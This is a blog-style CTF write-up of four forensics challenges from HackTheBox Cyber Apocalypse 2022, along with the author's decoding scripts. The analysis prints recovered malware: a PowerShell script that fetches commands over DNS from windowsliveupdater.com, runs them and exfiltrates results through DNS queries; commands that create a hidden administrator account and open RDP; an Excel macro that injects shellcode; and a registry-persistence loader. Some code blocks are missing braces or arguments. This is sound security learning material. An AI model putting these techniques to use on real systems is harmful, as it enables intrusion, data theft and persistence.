[CTF] HTB CA CTF 2022 - Forensics

Hy Friends , welcome back to my blog. I participated in this year’s HackTheBox CyberApocalypse CTF. I am so happy , my team TamilCTF secured Rank 73 out of 7024 teams. I Solved 4/8 Forensics challenges. Without futher ado lets jump into write-ups.

Majority of the challenges i solved are related to Malware Analysis and this is the first time i am trying this category. Especially PowerShell. I can’t believe that i was able to solve them on the first try. Alhamdulillah.


We are given with a bunch of Windows Event Log Files. I had no idea on how to open them , so i searched if any powershell scripts exist in this event logs.

strings * | grep ".ps1"

I saw some powershell scripts in the output. Next step is to extract them , I relied on this great article to extract the powershell script.

I ran the ExtractAllScripts.ps1 and extracted the scripts from Event Logs. As you can see, we got two Scripts sys_mgr.ps1 and special_orders.ps1. I checked the first script and it had nothing useful so opened second script.

Its a Powershell Malware. At first i wasted so much time by focusing on the shellcode $HVOASfFuNSxRXR , yes i was careless i followed the comments and didn’t bothered to look the code thoroughly. I couldn’t get the shellcode work at all. Then i looked into stage variables. It was so easy.

[byte[]] $stage1 = 0x99, 0x85, 0x93, 0xaa, 0xb3, 0xe2, 0xa6, 0xb9, 0xe5, 0xa3, 0xe2, 0x8e, 0xe1, 0xb7, 0x8e, 0xa5, 0xb9, 0xe2, 0x8e, 0xb3;
[byte[]] $stage2 = 0xac, 0xff, 0xff, 0xff, 0xe2, 0xb2, 0xe0, 0xa5, 0xa2, 0xa4, 0xbb, 0x8e, 0xb7, 0xe1, 0x8e, 0xe4, 0xa5, 0xe1, 0xe1;


$stage3 = $stage1 + $stage2;

#Unpack Special Orders!

for($i=0;$i -lt $stage3.count;$i++){
    $stage3[$i] = $stage3[$i] -bxor 0xd1;


I just needed to print out the stage3 variable.



In this challenge we are given a network capture (pcap) file. I opened it in wireshark and checked through each TCP Streams.

TCP Stream 17 had this strange image file. I decoded this base64 string and got a powershell script.


1  filter parts($query) { $t = $_; 0..[math]::floor($t.length / $query) | % { $t.substring($query * $_, [math]::min($query, $t.length - $query * $_)) }} 
2  $key = "a1E4MUtycWswTmtrMHdqdg=="
3  $out = Resolve-DnsName -type TXT -DnsOnly windowsliveupdater.com -Server|Select-Object -Property Strings;
4  for ($num = 0 ; $num -le $out.Length-2; $num++){
5  $encryptedString = $out[$num].Strings[0]
6  $backToPlainText = Decrypt-String $key $encryptedString
7  $output = iex $backToPlainText;$pr = Encrypt-String $key $output|parts 32
8  Resolve-DnsName -type A -DnsOnly start.windowsliveupdater.com -Server
9  for ($ans = 0; $ans -lt $pr.length-1; $ans++){
10 $domain = -join($pr[$ans],".windowsliveupdater.com")
11 Resolve-DnsName -type A -DnsOnly $domain -Server
12    }
13 Resolve-DnsName -type A -DnsOnly end.windowsliveupdater.com -Server
14 }

This is the main part of the script. So this is how it works :-

$key holds the AES key for encryption.

Line 3 statement make DNS request to windowsliveupdater.com using DNS Server and save DNS TXT field results to $out variable.

There is total 7 TXT fields in the DNS response , so the next loop runs 5 times and decrypt the string, stores it to $backToPlainText variable.

Then it executes the decrypted strings with iex statement and store its values to $output variable.

parts 32 split the result into 32 byte string. So $pr stores splitted parts of $output variable.

Before the second loop , script makes DNS request to start.windowsliveupdater.com , then in the loop it appends value from $pr variable and after the loop it makes DNS request to end.windowsliveupdater.com.

Here start and end telling , every Hex Encoded subdomain DNS requests between them are single AES encrypted string.

As you can see $backToPlainText have decrypted data , so i just printed its content by adding Write-Host $backToPlainText in the script to see whats inside. Upon running the script it gave this result.

wmic /namespace:\\root\SecurityCenter PATH AntiVirusProduct GET /value
net user DefaultUsr "JHBhcnQxPSdIVEJ7eTB1X2M0bl8n" /add /Y; net localgroup Administrators /add DefaultUsr; net localgroup "Remote Desktop Users" /add DefaultUsr
netsh advfirewall firewall add rule name="Terminal Server" dir=in action=allow protocol=TCP localport=3389

The base64 encoded string in this result is the first part of flag : $part1='HTB{y0u_c4n_'

Next step is to find the rest of the flag by decrypting AES encrypted strings , I made a small python script to extract AES encrypted strings from the pcap.

from scapy.all import *

pkts = rdpcap("capture.pcap")

i = 0

domains = []

for pkt in pkts:
    if pkt.haslayer(DNS):
        if pkt.an is not None:
            qname = pkt.qd.qname.decode()

for val in domains:
    if len(val) == 32 or val == "start" or val == "end":
        if len(val) == 32:
            print(val, end='')
            print('\n', val)            

We got the AES encrypted strings , but there is a problem , the script only takes base64 strings , what we have is hex.

Head into cyberchef and paste the hex strings then add recipe From Hex , then add Reciped To Base64.

I did like this for all hex strings and made the final script.

$ErrorActionPreference= 'silentlycontinue'

function Create-AesManagedObject($key, $IV) {
    $aesManaged = New-Object "System.Security.Cryptography.AesManaged"
    $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
    $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
    $aesManaged.BlockSize = 128
    $aesManaged.KeySize = 256
    if ($IV) {
        if ($IV.getType().Name -eq "String") {
            $aesManaged.IV = [System.Convert]::FromBase64String($IV)
        else {
            $aesManaged.IV = $IV
    if ($key) {
        if ($key.getType().Name -eq "String") {
            $aesManaged.Key = [System.Convert]::FromBase64String($key)
        else {
            $aesManaged.Key = $key

function Create-AesKey() {
    $aesManaged = Create-AesManagedObject $key $IV

function Encrypt-String($key, $unencryptedString) {
    $bytes = [System.Text.Encoding]::UTF8.GetBytes($unencryptedString)
    $aesManaged = Create-AesManagedObject $key
    $encryptor = $aesManaged.CreateEncryptor()
    $encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length);
    [byte[]] $fullData = $aesManaged.IV + $encryptedData

function Decrypt-String($key, $encryptedStringWithIV) {
    $bytes = [System.Convert]::FromBase64String($encryptedStringWithIV)
    $IV = $bytes[0..15]
    $aesManaged = Create-AesManagedObject $key $IV
    $decryptor = $aesManaged.CreateDecryptor();
    $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16);

filter parts($query) { $t = $_; 0..[math]::floor($t.length / $query) | % { $t.substring($query * $_, [math]::min($query, $t.length - $query * $_)) }} 
$key = "a1E4MUtycWswTmtrMHdqdg=="

# TXT fields from DNS request to windowsliveupdater.com

[String[]]$out = "Ifu1yiK5RMABD4wno66axIGZuj1HXezG5gxzpdLO6ws=", "hhpgWsOli4AnW9g/7TM4rcYyvDNky4yZvLVJ0olX5oA=", "58v04KhrSziOyRaMLvKM+JrCHpM4WmvBT/wYTRKDw2s=", "eTtfUgcchm/R27YJDP0iWnXHy02ijScdI4tUqAVPKGf3nsBE28fDUbq0C8CnUnJC57lxUMYFSqHpB5bhoVTYafNZ8+ijnMwAMy4hp0O4FeH0Xo69ahI8ndUfIsiD/Bru", "BbvWcWhRToPqTupwX6Kf7A0jrOdYWumqaMRz6uPcnvaDvRKY2+eAl0qT3Iy1kUGWGSEoRu7MjqxYmek78uvzMTaH88cWwlgUJqr1vsr1CsxCwS/KBYJXhulyBcMMYOtcqImMiU3x0RzlsFXTUf1giNF2qZUDthUN7Z8AIwvmz0a+5aUTegq/pPFsK0i7YNZsK7JEmz+wQ7Ds/UU5+SsubWYdtxn+lxw58XqHxyAYAo0=", "vJxlcLDI/0sPurvacG0iFbstwyxtk/el9czGxTAjYBmUZEcD63bco9uzSHDoTvP1ZU9ae5VW7Jnv9jsZHLsOs8dvxsIMVMzj1ItGo3dT+QrpsB4M9wW5clUuDeF/C3lwCRmYYFSLN/cUNOH5++YnX66b1iHUJTBCqLxiEfThk5A=", "M3/+2RJ/qY4O+nclGPEvJMIJI4U6SF6VL8ANpz9Y6mSHwuUyg4iBrMrtSsfpA2bh"
Write-Host -ForegroundColor Blue `n"------- Decrypted Strings from DNS TXT Field ---------" `n
for ($num = 0 ; $num -le $out.Length-2; $num++){
$encryptedString = $out[$num]
$backToPlainText = Decrypt-String $key $encryptedString
Write-Host -ForegroundColor Yellow $backToPlainText

# Converted Encrypted Sub Domains  to base64 Using CyberChef
# AES Hex -> RAW -> Base64 

$hostname = Decrypt-String $key "zByawpWKLmNgknLitPj0NjKoBlSbA6t+TrOXca7aShvBAGrIoD+XdrCDIb1tUke7"
$whoami = Decrypt-String $key "dnmJXRz3wHu2o0jhqkr8ZVlYpoVvGjSq1el+pVsIdnA18kl+WDbqDsofEoD1l0Kj"
$ipconfig = Decrypt-String $key "CeKN2CwUvDJRNlLawvLCew1zoyiKmA2PzvlL3c+eKCIqHKF7stkPzWFYhWNIeQQUIPw5xoSp43HMOgZUK2ZgBVhAvZTM5l4jYTkltNnSulMY6nW8ZTAE1F1QXtYlZwF6b6TnWT2DCS9nqBCC2ZMOmbog40qsxHdPBnRCxmIvXaKpsJ/1WKjfAA7L03gEzmY+NSFZm8dZEAWrZ5nFcGjPDcaITOzwHAzUT9a4LbeIs11i8C5Mqh2XP77MI1rp9AJUxj08k8iZMNosT0LZ/BI9i6sArKtRmK/MjGrNgbGc0mTMY1NmjOpMiMiu6h1YmAAi2o+i6RfxfChgiBi/VQ/qZpc7WoNVJYqwqiga2I9bnrEDrGZv4JodRJc2M1wJSE0nHDAcbVeAqyyfozO+OwGFvwcfsSBcTb6qIkEWiwdIkCps4UkDx8R+fIcxEETLmHOk"
$wmic = Decrypt-String $key "7KvDSdJ8Cw//0azu2+BrtsLrAA7k+bNdbwAVAOhWQqLcyPG+LPTWZ/RYwd5G0kscLg9dlOUmSccEAsGwov97Sfwy3dZ/J1MHp0ssTQhks/BIYYbalEPrdH9xezkRyVncfjAIRNYGVUEMOYgjjmFdYW8z0n9jzk0eBlpBaRG8UNRYdJWZ0ssI21YZiOspAuBdmIb92sK+1vbac2N60vIM8Zm4zj2d7gPAGAx9EZi0nAJ2nl7k6riW19O7R46hQIFneUcqJDv7CFKvNyMj7BMpiDyBo/KusdParoSW4dv5f0Na5AoJIDuJDEoXTXfLcCbE6ZCm+2Qkp1AYI60x09a2NEx5ccjUR8B4xEcXMq2IHDlLyLGmbgvtQ93DWSabV9HV1o3NKmCL9hcWu0fW/k1cnW6LspgfIUqCNLDdAhDKlustYyKw9/PXSMTJ+LgO/1ppIaPRqGIaSfTSm8mFHSUjCw=="
$net = Decrypt-String $key "hBvbTp5fi/chtY6DCBd7Vy6aAVln2lvxGskVX8IVnI9hDNgvgYtL315Ici2vS+7rq84wWD9QO0hL+ZAg4oobjygqI/6zohw62JiC9awN09V9h4dSMWUtD0Qx7DflGgnVfihU0RADq24vS/tPfiR32qRPyjvGAhd38D8TnUWMBSQ="

Write-Host -ForegroundColor Blue `n"-------- Decrypted Strings from DNS Sub Domains --------"
Write-Host -ForegroundColor Yellow "hostname    : " $hostname`n 
Write-Host -ForegroundColor Yellow "whoami      : " $whoami`n 
Write-Host -ForegroundColor Yellow "ipconfig    : " $ipconfig`n 
Write-Host -ForegroundColor Yellow "wmic result : " $wmic`n
Write-Host -ForegroundColor Yellow "net result  : " $net

Write-Host -ForegroundColor Blue `n"-------- Final Result ----------"  `n

$part1 = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("JHBhcnQxPSdIVEJ7eTB1X2M0bl8n")).Replace("'", "")
$part2 = $wmic.SubString($wmic.IndexOf('2')+2, 29)
$flag = -Join($part1.SubString($part1.Length - 12) , $part2)

Write-Host -ForegroundColor Red "Flag : "  $flag `n


Free Services

Here we are given a Macro Enabled Microsoft Excel Spread Sheet File. I opened it in Libreoffice to see whats inside.

The values in first column looks like some sort of MACRO scripts. I copied them to a text file and analysed what it does.

=set.value(C1, 0)
=call("Kernel32","WriteProcessMemory","JJJCJJ",-1, A2 + C1,B1, LEN(B1), 0)
=set.value(C1, C1 + 1)
=select(, "RC[2]")
=CALL("Kernel32","CreateThread","JJJJJJJ",0, 0, R2C6, 0, 0, 0)

Okay, after some time i figured out what this MACRO does.

Firstly it selects all values from cell E1 to G258. Then allocate kernel stuff , it doesn’t matter.

Next it sets cell C1 value to 0 and start a loop from 0 to 772 , 0 is incremented by 2 on each run.

Then it set the value of cell B1 with value of active cell XORED by 24 , loop continues , up to this all we need.

I have wasted lots of time on this challenge , because i selected the values in wrong order.

Values must be taken in this order E1, F1, G1 , E2 , F2, G2 not in E1, E2, E3 .....F1, F2, F3 order.

I copied the values and saved it in a text file , after aligning it in the right order i run a small python script to xor values.

# Copy Values In E1 , F1 , G1 , E2 , F2 , G2 order

file = open("values.txt", "r")
lines = file.readlines()
vals = []
for line in lines:
    line.replace('\n', '')

B1 = []

for i in range(0, 772, 2):
    print(chr(vals[i] ^ 24), end='')


Golden Persistence

We are given with NTUSER.dat , NTUSER.dat is a registry hive which stores User Profile and Data. From the challenge description we can see that we are dealing with Malware Persistence. Initially i searched for any suspicious programs exist in the registry entries.

reglookup NTUSER.dat | grep .exe

Nice , found a powershell entry with some base64 encoded text. I decoded the text and got a powershell script.


1  [Byte[]]$key = $enc.GetBytes("Q0mmpr4B5rvZi3pS")
2  $encrypted1 = (Get-ItemProperty -Path HKCU:\SOFTWARE\ZYb78P4s).t3RBka5tL
3  $encrypted2 = (Get-ItemProperty -Path HKCU:\SOFTWARE\BjqAtIen).uLltjjW
4  $encrypted3 = (Get-ItemProperty -Path HKCU:\SOFTWARE\AppDataLow\t03A1Stq).uY4S39Da
5  $encrypted4 = (Get-ItemProperty -Path HKCU:\SOFTWARE\Google\Nv50zeG).Kb19fyhl
6  $encrypted5 = (Get-ItemProperty -Path HKCU:\AppEvents\Jx66ZG0O).jH54NW8C
7  $encrypted = "$($encrypted1)$($encrypted2)$($encrypted3)$($encrypted4)$($encrypted5)"
8  $enc = [System.Text.Encoding]::ASCII
9  [Byte[]]$data = HexToBin $encrypted
10 $DecryptedBytes = encr $data $key
11 $DecryptedString = $enc.GetString($DecryptedBytes)
12 $DecryptedString|iex

This is the main part of the script.

$key holds encryption key , $encrypted1 to $encrypted5 loads some encrypted string from the Registry Hive , all five are joined together and saved into $encrypted variable.

Finally $DecryptedString is executed.

Running this script on my system gives error , because my Registry Hive don’t have the specified values.

So i opened the NTUSER.dat in Registry Explorer and checked each entries.

I copied each values to its specified place in script.

function encr {

    [Byte[]]$key = $enc.GetBytes("Q0mmpr4B5rvZi3pS")
    [Byte[]]$buffer = New-Object Byte[] $data.Length
    $data.CopyTo($buffer, 0)
    [Byte[]]$s = New-Object Byte[] 256;
    [Byte[]]$k = New-Object Byte[] 256;
    for ($i = 0; $i -lt 256; $i++)
        $s[$i] = [Byte]$i;
        $k[$i] = $key[$i % $key.Length];
    $j = 0;
    for ($i = 0; $i -lt 256; $i++)
        $j = ($j + $s[$i] + $k[$i]) % 256;
        $temp = $s[$i];
        $s[$i] = $s[$j];
        $s[$j] = $temp;
    $i = $j = 0;
    for ($x = 0; $x -lt $buffer.Length; $x++)
        $i = ($i + 1) % 256;
        $j = ($j + $s[$i]) % 256;
        $temp = $s[$i];
        $s[$i] = $s[$j];
        $s[$j] = $temp;
        [int]$t = ($s[$i] + $s[$j]) % 256;
        $buffer[$x] = $buffer[$x] -bxor $s[$t];
    return $buffer

function HexToBin {
    $return = @()
    for ($i = 0; $i -lt $s.Length ; $i += 2)
        $return += [Byte]::Parse($s.Substring($i, 2), [System.Globalization.NumberStyles]::HexNumber)
    Write-Output $return

$encrypted1 = "F844A6035CF27CC4C90DFEAF579398BE6F7D5ED10270BD12A661DAD04191347559B82ED546015B07317000D8909939A4DA7953AED8B83C0FEE4EB6E120372F536BC5DC39"
$encrypted2 = "CC19F66A5F3B2E36C9B810FE7CC4D9CE342E8E00138A4F7F5CDD9EED9E09299DD7C6933CF4734E12A906FD9CE1CA57D445DB9CABF850529F5845083F34BA1"
$encrypted3 = "C08114AA67EB979D36DC3EFA0F62086B947F672BD8F966305A98EF93AA39076C3726B0EDEBFA10811A15F1CF1BEFC78AFC5E08AD8CACDB323F44B4D"
$encrypted4 = "D814EB4E244A153AF8FAA1121A5CCFD0FEAC8DD96A9B31CCF6C3E3E03C1E93626DF5B3E0B141467116CC08F92147F7A0BE0D95B0172A7F34922D6C236BC7DE54D8ACBFA70D1"
$encrypted5 = "84AB553E67C743BE696A0AC80C16E2B354C2AE7918EE08A0A3887875C83E44ACA7393F1C579EE41BCB7D336CAF8695266839907F47775F89C1F170562A6B0A01C0F3BC4CB"
$encrypted = "$($encrypted1)$($encrypted2)$($encrypted3)$($encrypted4)$($encrypted5)"
$enc = [System.Text.Encoding]::ASCII
[Byte[]]$data = HexToBin $encrypted
$DecryptedBytes = encr $data
$DecryptedString = $enc.GetString($DecryptedBytes)
Write-Host -ForegroundColor Red $DecryptedString.Substring($DecryptedString.IndexOf("HTB"), 39)